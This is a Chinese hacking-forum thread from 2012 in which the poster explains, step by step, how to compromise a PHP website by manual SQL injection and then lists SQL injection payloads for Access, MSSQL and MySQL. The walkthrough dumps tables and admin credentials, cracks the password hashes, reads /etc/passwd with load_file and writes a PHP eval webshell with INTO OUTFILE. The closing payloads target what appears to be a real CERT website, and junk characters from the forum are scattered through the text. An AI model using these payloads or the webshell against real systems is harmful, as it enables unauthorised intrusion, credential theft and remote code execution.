找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2891|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
$ F" D1 t- _1 d# H% h让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
& Q0 w) k2 ?" A( u6 Z我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
7 t5 L. L! o2 ?' z4 s, G# X/ N如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
/ R+ H! w% p' }0 F) t1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
. L+ j2 M9 ^1 _! X* Y6 V这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:. G1 l3 n6 V0 b, N4 c# J
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in0 M) h* U5 Z2 f4 h- b! L; D
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入% @% z$ e: U# s1 Z6 s% y$ N
                         ' ~* c; O- ~: Y6 h: s
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,/ L7 ?, A3 M1 e" @4 h; I
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意* i2 h5 Y) J* D
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息2 f: i. B, |2 t4 j  |
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。  X( j" _# p2 n, F6 i1 x" K) l8 R
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,( ]+ M9 m9 a, o
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
4 a! \" b% E2 F. A我就用的是第二个思路,
: B; T" m7 I/ W( v# f! [0 {& k提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  : J7 x, v. I$ g% Q# t+ z; c: Y
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
0 B7 U: Z" T# s6 d, C" }提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--3 i3 f- e0 S$ i. I+ M6 {3 Z
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。: ~9 l1 {( o' Y+ f0 E& F
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????9 I0 a4 c+ C- T4 C6 \3 T' m
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....! w; T( j7 Y! Y7 w$ o6 N0 |6 b' U
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
' ]) S4 l7 V9 s6 ?1 ]( y然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,% M/ R6 U* s; `
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......4 j& A4 y) R! o5 W; e5 f6 L+ e, y
下面是一些很普遍注入方式资料:
5 D1 R8 R5 I" I: D2 [' t注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
- |/ J% B) T8 d+ l拆半法
: E/ }7 U/ R* }. D# V) b' u######################################& L' w& ~4 C# q+ c6 U$ n0 y
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
# d- w7 V% ^" p9 G/ e$ Qand exists (select * from admin)# O2 X* M0 z7 Z; X* A& O4 Y
and exists(select id from admin)
# s8 E' |: }8 A! P& S' Y% O! N# Jand exists(select id from admin where id=1)
6 {' n' s4 Q+ J' ]  Z$ [and exists(select id from admin where id>1)
: [2 ^/ \$ c) o! X6 I( r然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
* B/ _+ R0 S4 \' H# @5 U' ?, `and exists (select username from admin)0 K! g$ k, L4 b5 ], ]+ {
and exists (select password from admin), z8 g9 Q% f: t. O& t
and exists (select id from admin where len(username)<10 and id=1)6 D9 B2 G5 W8 U7 ]$ k& o. \
and exists (select id from admin where len(username)>5 and id=1)
$ E$ X, b' L( Q" _: Wand exists (select id from admin where len(username)=6 and id=1). `1 b. X- K- ?1 I3 p0 \9 h
and exists (select id from admin where len(password)<10 and id=1)
0 j- ?9 o0 z' y: I$ g0 [4 W- ]" k5 oand exists (select id from admin where len(password)>5 and id=1)
* D( Y' O7 A# M, [0 \6 Hand exists (select id from admin where len(password)=7 and id=1)
9 V- a, v: B+ j" E" c5 @and (select top 1 asc(mid(username,1,1)) from admin)=97
0 u1 k- w, M7 Z. o2 l返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
1 n9 o8 l+ s! Y! l6 u6 G6 m' h' h猜第二位把username,1,1改成username,2,1就可以了。$ W0 r% H$ S  T/ [
猜密码把username改成password就OK了
9 F) ~! i6 S2 d2 o3 Z7 Z% w4 Y. u##################################################0 q9 Q4 M9 w5 w+ {  \/ w
搜索型注入; r$ V2 f$ G( i8 W& b& O, F
##################################
+ q, k. M9 w3 K7 V! o/ U+ u%' and 1=1 and '%'='4 ~) B0 T! f: P" b: g! S( S1 |
%' and exists (select * from admin) and '%'='# `& T5 Q6 U6 g4 S5 M# v
%' and exists(select id from admin where id=1) and '%'='
1 s( c7 `: N- T* u%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
& [! C9 N. m9 Y, ^" x0 }& l%' and exists (select id from admin where len(password)=7 and id=1) and '%'='/ e2 Y  ~+ S) p+ S6 _9 @4 t
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='' ~7 N5 r) f& L& |
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
( S, S0 t7 Z$ y8 ]0 e# T7 F! o对于MSSQL数据库,后面可以吧 and '%'='换成--/ m0 l/ b& v: R& s
还有一点搜索型注入也可以使用union语句。
- ?1 o! X+ f+ i5 K########################################################
* ?, n6 e  `8 Q' a( I联合查询。
3 `! k* f/ x8 b6 _' _3 X; [5 c#####################################( y* x7 }8 v# k" h
order by 10
8 i6 U2 F# o$ S4 \) L9 D# W/ ~and 1=2 union select 1,2,3,4,5,6,7,8,9,107 v$ F: N  W- `1 u
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
! ?/ j- Z3 }# v0 r) C. u0 {and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=13 e) }$ C6 Y2 _9 h
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)( r5 \1 {4 ]1 y) w
###################################
# ~# A! G2 C2 N& Z1 rcookie注入
; W5 C8 a/ u- g: T$ h###############################: C4 E# Q# g% K$ }
http://www.******.com/shownews.asp?id=127
$ F2 P" w1 K/ o  L: d! W: lhttp://www.******.com/shownews.asp2 V( A8 H+ e/ Z/ ?+ o, s, B: ~
alert(="id="+escape("127"));4 X" s! L" C5 y  c1 v( ~
alert(="id="+escape("127 and 1=1"));3 B- v; q7 I( c
alert(="id="+escape("127 order by 10"));# r- _: ~7 V8 k4 n+ n8 {# u0 G) y
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
, E) G$ z0 f* t0 [6 |, ualert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));, S1 T7 N3 g$ q8 n4 X- {# c
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
; }7 [8 B6 B+ |& _% V###################################
' O8 }6 Y/ r! r+ l: Z2 m1 I# \; g偏移注入) ^# \% w2 ~0 j! ^( u; k
###########################################################" M3 b' ?( x* D% i7 p
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
0 E% R" O* U$ `) Eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin- G8 ]9 x6 R# W
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
- ~: u2 l! u" k' Lunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
# q5 M( P* A- x0 t" |3 hunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
# F0 O1 A) j. I2 Tunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)1 D; D" H! H4 V  x0 T
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
& f% x6 A9 E# N) U4 ?a.id=d.id)
# F# d& u  j9 Gand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
6 w: B9 R; J: A% Gand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) ' L0 k8 a: `8 N- E# e# H
  : z2 q, x! ^% t( }# g
============================================================================================================* S) O6 y2 i. W) f/ N* a' c
1.判断版本
4 R* ~" Z1 Y. n8 y( b2 v0 Y6 Dand ord(mid(version(),1,1))>51  p- G2 L2 M' u
返回正常,说明大于4.0版本,支持ounion查询
' s& ~, A7 [; T0 }7 K2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
! a* N: n+ w; `* jand 2=4 union select 1,2,3,4,5,6,7,8,9--3 ?) ^  _* B% A  I  d% q% v
3.查看数据库版本及当前用户,1 O3 U# |6 K- C1 Q- \. U* d5 ?
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--' P# C) p. n3 y! t, u- X7 ^
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假," b9 W/ c( S8 v
4.判断有没有写权限
4 ~- K( {1 y& `% Yand (select count(*) from MySQL.user)>0-- - I. p5 \3 z& H, Q+ _; m
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
- j" H8 a0 M& I. v2 K$ H用不了这个命令,就学习土耳其黑客手法,如下! U. j+ r! Y: {, K
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
) _6 m, E5 Y8 \% B- [/ r* M& W6.爆表,爆库
  x% O2 C' h) S  j7 v! S+ Tand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
. T0 J% g; L. m6 R- z; d9 R3 R# M# Y7.爆列名,爆表' i1 j; n) l) P2 X% H, z
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--  S8 A& P/ x" k" b; ~
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
6 L6 |. Z' f6 \and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
  I- w. Y/ I7 S& c9.爆字段内容
7 f! T6 u3 m5 l3 J! uand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
6 @$ b; y/ ~5 Fhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表